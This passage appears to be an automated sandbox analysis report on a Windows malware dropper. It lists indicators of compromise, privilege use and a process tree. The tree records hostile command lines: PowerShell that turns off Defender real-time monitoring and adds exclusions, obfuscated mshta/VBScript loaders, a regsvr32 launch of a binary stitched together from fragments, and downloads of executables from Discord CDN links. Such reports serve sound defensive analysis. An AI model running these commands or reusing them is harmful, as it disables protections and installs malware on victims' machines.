04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
POWERPNT.EXEWINWORD.EXEpid process 7032 POWERPNT.EXE 5380 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeWerFault.exeMon178e7a516181.exepid process 1560 powershell.exe 1560 powershell.exe 1540 powershell.exe 1540 powershell.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 4376 WerFault.exe 3176 Mon178e7a516181.exe 3176 Mon178e7a516181.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEfoldershare.exepid process 3196 Explorer.EXE 2244 foldershare.exe -
Suspicious behavior: MapViewOfSection 13 IoCs
Processes:
adF6KxjhcOfjYh4ost48IawU.exeE_OHOPUQK1p49G7oDJQPE6PW.exeyOj1WECF7HJNMLcwMO9spdy6.exemsiexec.exe6F64.exepid process 6064 adF6KxjhcOfjYh4ost48IawU.exe 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe 6064 adF6KxjhcOfjYh4ost48IawU.exe 6064 adF6KxjhcOfjYh4ost48IawU.exe 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe 6424 yOj1WECF7HJNMLcwMO9spdy6.exe 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe 1756 msiexec.exe 1756 msiexec.exe 6704 6F64.exe 1756 msiexec.exe 1756 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
msedge.exepid process 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe 6156 msedge.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
WinHoster.execli.exepid process 5900 WinHoster.exe 2964 cli.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Mon17870faab0.exeMon178d8e5d06822.exeMon17332e41e6b.exepowershell.exepowershell.exeDownFlSetup110.exetaskkill.exechrome.exeQFWlN69O9FNkcWfwdW6z88Ve.exedescription pid process Token: SeCreateTokenPrivilege 4040 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 4040 Mon17870faab0.exe Token: SeLockMemoryPrivilege 4040 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 4040 Mon17870faab0.exe Token: SeMachineAccountPrivilege 4040 Mon17870faab0.exe Token: SeTcbPrivilege 4040 Mon17870faab0.exe Token: SeSecurityPrivilege 4040 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 4040 Mon17870faab0.exe Token: SeLoadDriverPrivilege 4040 Mon17870faab0.exe Token: SeSystemProfilePrivilege 4040 Mon17870faab0.exe Token: SeSystemtimePrivilege 4040 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 4040 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 4040 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 4040 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 4040 Mon17870faab0.exe Token: SeBackupPrivilege 4040 Mon17870faab0.exe Token: SeRestorePrivilege 4040 Mon17870faab0.exe Token: SeShutdownPrivilege 4040 Mon17870faab0.exe Token: SeDebugPrivilege 4040 Mon17870faab0.exe Token: SeAuditPrivilege 4040 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 4040 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 4040 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 4040 Mon17870faab0.exe Token: SeUndockPrivilege 4040 Mon17870faab0.exe Token: SeSyncAgentPrivilege 4040 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 4040 Mon17870faab0.exe Token: SeManageVolumePrivilege 4040 Mon17870faab0.exe Token: SeImpersonatePrivilege 4040 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 4040 Mon17870faab0.exe Token: 31 4040 Mon17870faab0.exe Token: 32 4040 Mon17870faab0.exe Token: 33 4040 Mon17870faab0.exe Token: 34 4040 Mon17870faab0.exe Token: 35 4040 Mon17870faab0.exe Token: SeDebugPrivilege 1260 Mon178d8e5d06822.exe Token: SeDebugPrivilege 720 Mon17332e41e6b.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 4788 DownFlSetup110.exe Token: SeDebugPrivilege 5196 taskkill.exe Token: SeDebugPrivilege 5544 chrome.exe Token: SeCreateTokenPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeAssignPrimaryTokenPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeLockMemoryPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeIncreaseQuotaPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeMachineAccountPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeTcbPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeSecurityPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeTakeOwnershipPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeLoadDriverPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeSystemProfilePrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeSystemtimePrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeProfSingleProcessPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeIncBasePriorityPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeCreatePagefilePrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeCreatePermanentPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeBackupPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeRestorePrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeShutdownPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeDebugPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeAuditPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeSystemEnvironmentPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeChangeNotifyPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe Token: SeRemoteShutdownPrivilege 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Mon17bbf11fdb575d.tmpinstaller.exemsedge.exeCalculator.exeExplorer.EXEsetting.exeinstaller.exevpn.tmppid process 2148 Mon17bbf11fdb575d.tmp 3236 installer.exe 6156 msedge.exe 8576 Calculator.exe 3196 Explorer.EXE 5980 setting.exe 7244 installer.exe 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp 1528 vpn.tmp -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEpid process 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
Explorer.EXEPOWERPNT.EXEWINWORD.EXEcmd.execmd.exeMaskVPNUpdate.exepid process 3196 Explorer.EXE 7032 POWERPNT.EXE 5380 WINWORD.EXE 7032 POWERPNT.EXE 7032 POWERPNT.EXE 7032 POWERPNT.EXE 5380 WINWORD.EXE 5380 WINWORD.EXE 5380 WINWORD.EXE 7032 POWERPNT.EXE 7032 POWERPNT.EXE 5380 WINWORD.EXE 5380 WINWORD.EXE 5380 WINWORD.EXE 7160 cmd.exe 5888 cmd.exe 5968 MaskVPNUpdate.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3196 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exedescription pid process target process PID 568 wrote to memory of 1692 568 setup_x86_x64_install.exe setup_installer.exe PID 568 wrote to memory of 1692 568 setup_x86_x64_install.exe setup_installer.exe PID 568 wrote to memory of 1692 568 setup_x86_x64_install.exe setup_installer.exe PID 1692 wrote to memory of 2488 1692 setup_installer.exe setup_install.exe PID 1692 wrote to memory of 2488 1692 setup_installer.exe setup_install.exe PID 1692 wrote to memory of 2488 1692 setup_installer.exe setup_install.exe PID 2488 wrote to memory of 2204 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2204 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2204 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1292 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1292 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1292 2488 setup_install.exe cmd.exe PID 1292 wrote to memory of 1540 1292 cmd.exe powershell.exe PID 1292 wrote to memory of 1540 1292 cmd.exe powershell.exe PID 1292 wrote to memory of 1540 1292 cmd.exe powershell.exe PID 2204 wrote to memory of 1560 2204 cmd.exe powershell.exe PID 2204 wrote to memory of 1560 2204 cmd.exe powershell.exe PID 2204 wrote to memory of 1560 2204 cmd.exe powershell.exe PID 2488 wrote to memory of 1440 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1440 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1440 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1580 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1580 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1580 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2972 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2972 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2972 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1820 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1820 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 1820 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2168 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2168 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2168 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 444 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 444 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 444 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2084 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2084 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2084 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2264 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2264 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2264 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 5024 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 5024 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 5024 2488 setup_install.exe cmd.exe PID 1580 wrote to memory of 3176 1580 cmd.exe Mon178e7a516181.exe PID 1580 wrote to memory of 3176 1580 cmd.exe Mon178e7a516181.exe PID 1580 wrote to memory of 3176 1580 cmd.exe Mon178e7a516181.exe PID 2488 wrote to memory of 3352 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3352 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3352 2488 setup_install.exe cmd.exe PID 1440 wrote to memory of 4040 1440 cmd.exe Mon17870faab0.exe PID 1440 wrote to memory of 4040 1440 cmd.exe Mon17870faab0.exe PID 1440 wrote to memory of 4040 1440 cmd.exe Mon17870faab0.exe PID 2488 wrote to memory of 2808 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2808 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 2808 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3684 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3684 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3684 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3676 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3676 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3676 2488 setup_install.exe cmd.exe PID 2488 wrote to memory of 3988 2488 setup_install.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f8⤵
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon178e7a516181.exeMon178e7a516181.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\AHF75qBjiaQYz2D8BbekPx7V.exe"C:\Users\Admin\Pictures\Adobe Films\AHF75qBjiaQYz2D8BbekPx7V.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe"C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\7A96.bat "C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\6148\18.exe18.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\6148\Transmissibility.exeTransmissibility.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\Pictures\Adobe Films\GUJG8vfRqogim7xN2gxq4qxO.exe"C:\Users\Admin\Pictures\Adobe Films\GUJG8vfRqogim7xN2gxq4qxO.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
